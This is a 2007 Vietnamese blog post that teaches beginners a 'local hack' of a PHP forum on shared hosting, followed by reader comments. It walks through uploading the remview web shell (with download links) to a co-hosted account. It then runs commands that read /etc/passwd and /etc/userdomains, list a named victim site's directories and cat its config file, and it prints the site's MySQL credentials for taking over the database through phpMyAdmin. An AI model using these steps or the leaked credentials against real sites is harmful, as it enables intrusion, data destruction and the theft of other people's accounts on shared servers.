Wednesday, June 20, 2007

Cách hack local cổ điển

Chào các bạn , hôm nay mình xin giới thiệu 1 cách hack forum , theo tôi nghĩ nó ở mức nguy hiểm cao , hầu hết các diễn đàn php đều có cơ sở dữ SQL và nội dung bài viết này làm cách nào là đọc file config.php , trong khi họ đã chmod để lấy pass mySQL của victim , sữ dụng phpmyadmin để drop hay đoạt quyền admin diễn đàn . Nếu bạn là 1 hacker tôi nói đến đây là kết thúc bài viết , tôi nghĩ bạn đủ thông minh để hiểu và không nên mất thời gian xem những cái mà mình đã biết rồi . Còn ngược lại bạn chưa hiểu thì chúng ta tiếp tục sang bước tiếp theo nhé .bài viết này dành cho newbie Okie chứ?
Ở đây tôi lấy 1 site vd www.forums.ngoisaonho.info site này mới thành lập chưa có thành viên nên mức độ ảnh hưởng sẽ không cao , cho việc tôi dùng nó để miêu tả 1 bài viết . Bạn dùng 1 công cụ để kiểm tra victim của bạn mua host ở đâu www.checkdomain.com bạn có thể dùng nó ! chúng ta tiếp tục nhé
Bước 1 : Up load backdoor lên host của bạn cùng sever lên host victim . Tôi dùng remview bạn dùng cái gì thì tuỳ (vào google đánh từ khóa remview để down về . vì có nhiều cách để local . có thể dùng cgitelnet cũng được)
copy đoạn code remview.php
down tại http://www.ktv4vn.com/rem.zip
Bước 2
okie ! up con backdoor này lên host của bạn và chạy nó với link
http://www.localhost.com/remview.php
Có 1 khó khăn cho tôi khi host của victim chmod khả chuẩn khiến tôi không thể view host . Tôi phải đi đường vòng sữ dụng chức năng Shell commands
okie trong Shell commands bạn cho run lệnh
Trích:
cat /etc/passwd;
Trích:
ngoisaon:33217:33218::/home/ngoisaon:/usr/local/cpanel/bin/noshell
Tiếp trong shell commands bạn cho run lệnh
cat /etc/userdomains;
Tôi tìm đúng domain của victim như vậy ta có user victim là ngoisaon
Trích:
ngoisaonho.info: ngoisaon
Như phần trên đã nói host victim chmod khá chuẩn nên tôi phải tiếp tục sữ dụng công cụ Shell commands để view host victim
trong Shell commands run lệnh dir với user bạn vừa tìm được như sau:
dir /home/victim/public_html/;
thu được
Trích:
cgi-bin index.htm _private _vti_inf.html _vti_txt xoa
diendan music _vti_bin _vti_log wait.gif
forums postinfo.html _vti_cnf _vti_pvt welcome
Chạy tiếp lện dir để view thư mục forums
dir /home/victim/public_html/forums;
thu được
Trích:
admin.php fonts MBinstall.php style_images
cache html modules uploads
cgi-bin icon_db_hack.php show.php viewsong.php
conf_global.php index.php Skin xoa
conf_mime_types.php install_templates.txt sources
css.php ipchat.php ssi.php
datamusic.sql lang ssi_templates
Cái mà tôi cần view là file conf_global.php run với lện cat như sau :
cat /home/victim/public_html/forums/conf_global.php;
Trích:
$INFO['sql_database'] = 'ngoisaon_Forums';
$INFO['sql_driver'] = 'mySQL';
$INFO['sql_host'] = 'localhost';
$INFO['sql_pass'] = 'HANOIMUATHU';
Đến đây bạn đã lấy thấy được user : ngoisaon_Forums và pass là HANOIMUATHU , việc còn lại là dùng nó để vào phpmyadmin của victim , bạn vào phpmyadmin sẽ có rất nhiều cho vui , nên nhớ rằng để người khác vào phpmyadmin của mình điều này còn tệ hơn việc victim bị hack pass admin trong forum , bạn có thể vào phpmyadmin của victim bằng nhiều cách có thể tìm link của victim hay setup phpmyadmin ở host bạn hay sữ dụng 1 tool nào đó để hổ trợ bạn làm việc này .
Hình như remview này mọi người thường dùng http://php.spb.ru/remview/remview_2003_10_23.zip

3 comments:

Anonymous said...

Cám ơn bạn đã chia sẽ kinh nghiệm.

Anonymous said...

ban co the lien he voi minh dc ko? minh dang can ban giup do~, neu dc thi pm cho minh qua dc yahoo : messenger_1707. bai viet cua ban post minh rat quan tam, thanks! lien lac voi minh som nhe

Anonymous said...

Chào bạn, mình đã đọc bài viết của bạn, thực sự rất hay, mình cũng đang mày mò làm forum, mình thấy bài viết của bạn rất hay mặc dù mình chưa hiểu hết được những gì mà bạn nói, mình muốn hỏi là nếu ChMod thì phải ChMod thế nào cho đúng và nếu như làm như bạn bảo thì tất cả các diễn đàn đều có thể bị hack dễ vậy sao? mình là newbie trong lĩnh vực này vì vậy mong bạn giúp đỡ mình! Bạn có thể gửi cho mình ebook về các câu lệnh shell được không, mình thấy cái này rất hay cần phải học! Cám ơn bạn!